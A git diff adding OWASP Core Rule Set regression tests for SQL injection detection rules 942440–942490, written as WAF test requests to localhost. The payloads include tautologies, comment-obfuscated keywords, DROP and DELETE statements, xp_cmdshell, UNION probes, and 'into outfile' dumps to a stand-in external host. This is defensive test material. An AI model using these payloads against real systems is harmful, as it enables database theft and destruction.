b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml @@ -0,0 +1,309 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942440.yaml +tests: + - test_title: 942440-1 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/post?var=DROP%20sampletable%3b--" + version: HTTP/1.0 + output: + log_contains: id "942440" + - test_title: 942440-2 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1;%00" + output: + log_contains: id "942440" + - test_title: 942440-3 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=OR 1# " + output: + log_contains: id "942440" + - test_title: 942440-4 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=admin'--" + output: + log_contains: id "942440" + - test_title: 942440-5 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DROP/*comment*/sampletable" + output: + log_contains: id "942440" + - test_title: 942440-6 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DR/**/OP/*bypass deny listing*/sampletable" + output: + log_contains: id "942440" + - test_title: 942440-7 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" + output: + log_contains: id "942440" + - test_title: 942440-8 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename" + output: + log_contains: id "942440" + - test_title: 942440-9 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1# " + output: + log_contains: id "942440" + - test_title: 942440-10 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=‘ or 1=1-- -" + output: + log_contains: id "942440" + - test_title: 942440-11 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=‘ or 1=1/*" + output: + log_contains: id "942440" + - test_title: 942440-12 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=1='1' or-- -" + output: + log_contains: id "942440" + - test_title: 942440-13 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!50000or*/1='1" + output: + log_contains: id "942440" + - test_title: 942440-14 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!or*/1='1" + output: + log_contains: id "942440" + - test_title: 942440-15 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=0/**/union/*!50000select*/table_name`foo`/**/" + output: + log_contains: id "942440" + - test_title: 942440-16 + desc: "Avoid False Positive on JWT (body)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + no_log_contains: id "942440" + - test_title: 942440-17 + desc: "Avoid False Positive on JWT (cookie)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "foo=bar" + output: + no_log_contains: id "942440" + - test_title: 942440-18 + desc: "Avoid False Positive on JWT (querystring)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + no_log_contains: id "942440" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml new file mode 100644 index 00000000..a308e3be --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml @@ -0,0 +1,92 @@ +--- +meta: + author: "William Woodson" + description: None + enabled: true + name: 942450.yaml +tests: + - test_title: 942450-1 + desc: "SQL Hex Encoding" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=%5c0xf00dsdfdsa" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_title: 942450-2 + desc: "SQL Hex Encoding" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_title: 942450-3 + desc: "SQL Hex Encoding" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=select%200x616263" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_title: 942450-4 + desc: "SQL Hex Encoding - negative" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=IHRlc3Q0xAcF" + version: HTTP/1.0 + output: + no_log_contains: id "942450" + - test_title: 942450-5 + desc: "SQL Hex Encoding - negative" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" + version: HTTP/1.0 + output: + no_log_contains: id "942450" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml new file mode 100644 index 00000000..e2776bd0 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml @@ -0,0 +1,41 @@ +--- +meta: + author: "Franziska Bühler" + description: None + enabled: true + name: 942460.yaml +tests: + - test_title: 942460-1 + desc: "Repetitive Non-Word Characters" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=foo...." + version: HTTP/1.1 + output: + log_contains: id "942460" + - test_title: 942460-2 + desc: "Repetitive Non-Word Characters negative test only 3 characters" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=foo..." + version: HTTP/1.1 + output: + no_log_contains: id "942460" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml new file mode 100644 index 00000000..0b569ede --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml @@ -0,0 +1,193 @@ +--- +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942470.yaml +tests: + - test_title: 942470-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=nvarchar" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=xp_cmdshell" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-3 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=varchar" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-4 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=xp_dirtree" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-5 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=xp_regread" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-6 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sp_password" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-7 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=UTL_HTTP" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-8 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=OPENROWSET" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-9 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sp_executesql" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-10 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "sp_executesql" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-11 + desc: "SQL Injection Attack: current_user" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=1%2bcurrent_user::int" + version: HTTP/1.0 + output: + log_contains: id "942470" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml new file mode 100644 index 00000000..64565771 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml @@ -0,0 +1,210 @@ +--- +meta: + author: "Jose Nazario" + description: None + enabled: true + name: 942480.yaml +tests: + - test_title: 942480-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # variable name boundary attacks + uri: "/?'msdasql'" + version: HTTP/1.0 + output: + log_contains: "id \"942480" + - test_title: 942480-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + # variable name boundary attacks + Cookie: "'msdasql'" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + version: HTTP/1.0 + output: + log_contains: "id \"942480" + - test_title: 942480-3 + desc: "Data dump using 'into outfile'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-4 + desc: "Data dump using 'into outfile'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-5 + desc: "SQL injection using 'UNION ALL" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=0.3480567293179807' UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-6 + desc: "SQL injection using 'UNION ALL" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=config.ini\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-7 + desc: "SQL injection using 'UNION ALL" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=CRS) UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-8 + desc: "SQL injection using 'UNION ALL" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=CRS3\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-9 + desc: "SQL injection using 'overlay(...placing..)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-10 + desc: "SQL injection in User-Agent" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-11 + desc: "SQL injection in arbitrary header" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + SomeHeader: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-12 + desc: "SQL injection using 'overlay(...placing..) with newlines" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" + version: HTTP/1.0 + output: + log_contains: id "942480" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml new file mode 100644 index 00000000..d02e1780 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml @@ -0,0 +1,380 @@ +--- +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942490.yaml +tests: + - test_title: 942490-1 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%22%60%20%2A%20123" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-2 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "' ', 10" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-3 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "'', '', '', '', '', '', '', '', 13" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-4 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "`>65" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-5 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='1001'='10" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-6 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\"2562*23" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-7 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=\":[\"00" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-8 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=`>6fbdec2" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-9 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='][0]]), strtolower($b[$GLOBALS['" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-10 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=', 2, 1" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-11 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "`>9e7" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-12 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=\":\"65" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-13 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='\\2nq5" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-14 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=` < 0) AND `" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-15 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + 